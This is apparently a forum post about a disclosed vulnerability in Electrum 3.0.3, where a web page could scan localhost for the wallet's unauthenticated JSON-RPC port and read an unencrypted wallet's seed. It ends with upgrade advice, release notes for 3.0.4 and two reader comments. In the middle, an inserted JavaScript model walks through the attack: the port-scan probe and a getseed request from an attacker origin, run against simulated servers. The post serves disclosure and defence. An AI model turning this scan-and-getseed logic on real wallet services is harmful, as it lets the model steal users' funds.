A critical vulnerability was just found on Electrum Bitcoin Wallet

in #bitcoin · 7 years ago (edited)

What is this vulnerability?

Just one day ago the GitHub user taviso (Tavis Ormandy of Google Project Zero) reported a serious vulnerability in the Electrum Bitcoin wallet. It lets a malicious website steal your Electrum wallet seed with nothing more than JavaScript running in your browser: Electrum's JSON-RPC server listens on localhost without any authentication, and any web page you visit can send it commands. The seed itself can only be taken if the wallet is not password-protected; an unencrypted wallet hands it over on request.

How does it work?

On the Electrum GitHub issue he shows step by step how the seed can be taken:

  1. He installed Electrum 3.0.3 on Windows.
  2. He created a new wallet with all default settings, leaving it unencrypted (no password), which is the default.
  3. He visited a test page in Chrome. The JSON-RPC server is enabled by default and listens on a random localhost port, but a website run by an attacker can scan for the right port from inside the browser in seconds.
  4. After a few seconds the scan found the right port, and an alert() popped up with the wallet seed: {"id": 0.7398595146147573, "result": "pony south strike horror throw acquire able afford pen lunch monster runway", "jsonrpc": "2.0"}
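The exchange those four steps describe, as an added example that is not part of the original post or of Electrum's code: a JavaScript model of a page that scans localhost for the JSON-RPC port and then issues the getseed command, run against a model of the pre-3.0.4 server (no credential, permissive CORS) and against an assumed hardened server that refuses browser-originated requests and demands a password. The wallet contents, ports, origins and both server models are constructed for the demonstration; the hardened variant illustrates the checks a localhost RPC service needs and is not Electrum's actual patch.

```javascript
// Added example, not from the post or the Electrum project. Models the
// browser -> localhost JSON-RPC exchange; wallet, ports and servers are constructed.

// JSON-RPC 2.0 request in the shape the post's alert() echoed back
// (Electrum answered with the same float id the page sent).
function buildRpcRequest(method, params = [], id = Math.random()) {
  return JSON.stringify({ id, method, params, jsonrpc: "2.0" });
}

function rpcReply(id, fields, headers = {}) {
  return { status: 200, headers, body: JSON.stringify({ id, ...fields, jsonrpc: "2.0" }) };
}

// Model of the pre-3.0.4 behaviour: any method runs, no credential is needed,
// and "Access-Control-Allow-Origin: *" lets the calling page read the result.
function vulnerableServer(wallet) {
  return (req) => {
    const { id, method } = JSON.parse(req.body);
    const cors = { "access-control-allow-origin": "*" };
    if (method === "version") return rpcReply(id, { result: "3.0.3" }, cors);
    if (method === "getseed") {
      // An encrypted wallet cannot hand out its seed without the password.
      if (wallet.password) return rpcReply(id, { error: "password required" }, cors);
      return rpcReply(id, { result: wallet.seed }, cors);
    }
    return rpcReply(id, { error: "unknown method" }, cors);
  };
}

// Assumed hardening (an illustration, not Electrum's actual patch): refuse any
// request carrying a browser Origin header, require a Basic-auth password, and
// send no CORS header at all.
function hardenedServer(wallet, rpcPassword) {
  const inner = vulnerableServer(wallet);
  const expected = "Basic " + Buffer.from("user:" + rpcPassword).toString("base64");
  return (req) => {
    if (req.headers.origin !== undefined) return { status: 403, headers: {}, body: "" };
    if (req.headers.authorization !== expected) return { status: 401, headers: {}, body: "" };
    const res = inner(req);
    delete res.headers["access-control-allow-origin"];
    return res;
  };
}

// What a page at pageOrigin can do: the browser always sends the POST (a
// text/plain body is a "simple request", so there is no preflight) with an
// Origin header, and exposes the reply to the page only if CORS allows it.
function browserCrossOriginPost(server, pageOrigin, body) {
  const res = server({ headers: { origin: pageOrigin, "content-type": "text/plain" }, body });
  const acao = res.headers["access-control-allow-origin"];
  const readable = res.status === 200 && (acao === "*" || acao === pageOrigin);
  return { readable, body: readable ? res.body : null };
}

// The attack page's scan: send a JSON-RPC "version" probe to each candidate
// port and accept the first reply that echoes the probe id. connect(port)
// returns the server model listening there, or null for a closed port, so
// the scan runs offline here instead of over real sockets.
function findRpcPort(connect, ports, pageOrigin) {
  const probeId = 0.25;
  const probe = buildRpcRequest("version", [], probeId);
  for (const port of ports) {
    const server = connect(port);
    if (server === null) continue;
    const r = browserCrossOriginPost(server, pageOrigin, probe);
    if (!r.readable) continue;
    try {
      const reply = JSON.parse(r.body);
      if (reply.jsonrpc === "2.0" && reply.id === probeId) return port;
    } catch (_) { /* not JSON: some other local service answered */ }
  }
  return null;
}

// The full chain from the post: locate the port, then ask for the seed.
function stealSeed(connect, ports, pageOrigin) {
  const port = findRpcPort(connect, ports, pageOrigin);
  if (port === null) return { port: null, seed: null };
  const r = browserCrossOriginPost(connect(port), pageOrigin, buildRpcRequest("getseed", [], 0.5));
  if (!r.readable) return { port, seed: null };
  return { port, seed: JSON.parse(r.body).result || null };
}

// Constructed host: one Electrum-like listener on an ephemeral port, the rest closed.
function scenario(makeServer, ports = [40000, 40001, 40002, 40003]) {
  const rpcPort = ports[2];
  const server = makeServer();
  return { rpcPort, ports, connect: (p) => (p === rpcPort ? server : null) };
}

const EVIL_ORIGIN = "https://attacker.example"; // constructed attacker site
const UNPROTECTED = { seed: "constructed seed words for this example", password: null };

// Demo: the unencrypted wallet gives up its seed to the attacker's page.
const demo = scenario(() => vulnerableServer(UNPROTECTED));
console.log(stealSeed(demo.connect, demo.ports, EVIL_ORIGIN));
```

The point the model makes is that CORS never stops the request from reaching the server: the browser sends the text/plain POST regardless, and only the Access-Control-Allow-Origin header decides whether the page may read the reply. A localhost service that executes commands without a credential is therefore reachable from any page the user visits; a password-protected wallet survives the scan only because getseed refuses without the password, while the hardened model refuses the probe itself, so the scan never even finds the port.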

Am I at risk?

Yes, if you are running 3.0.3 or any older version of Electrum. Every affected version is exposed to port scanning and deanonymization by any website you visit; the seed itself can be stolen only if your wallet is not encrypted with a password, so an unprotected wallet is the case that matters most.

How to fix this issue?

The Electrum developers are aware of this serious vulnerability and have already shipped a fix.
Electrum has released a new version with the vulnerability closed. Everyone, please download version 3.0.4 from the official website, and verify the PGP signature of the download before installing. If you used an unencrypted wallet on an affected version while browsing, consider the seed possibly exposed: create a new wallet and move your funds to it.

Download version 3.0.4: https://electrum.org/#download

Release notes: https://github.com/spesmilo/electrum/blob/3.0.4/RELEASE-NOTES

Release notes of Electrum Wallet Version 3.0.4

Release 3.0.4 : (Security update)

  • Fix a vulnerability caused by Cross-Origin Resource Sharing (CORS)
    in the JSONRPC interface. Previous versions of Electrum are
    vulnerable to port scanning and deanonymization attacks from
    malicious websites. Wallets that are not password-protected are
    vulnerable to theft.
  • Bundle QR scanner with Android app
  • Minor bug fixes


It says to hold your coins in your wallet to be safe, and then this kind of thing happens. The only thing I hate about crypto is that you are not really safe :(

Thanks! Upvoted because everyone needs to know. I have a password on mine, so I guess I'm relatively safe, but I will upgrade anyway.

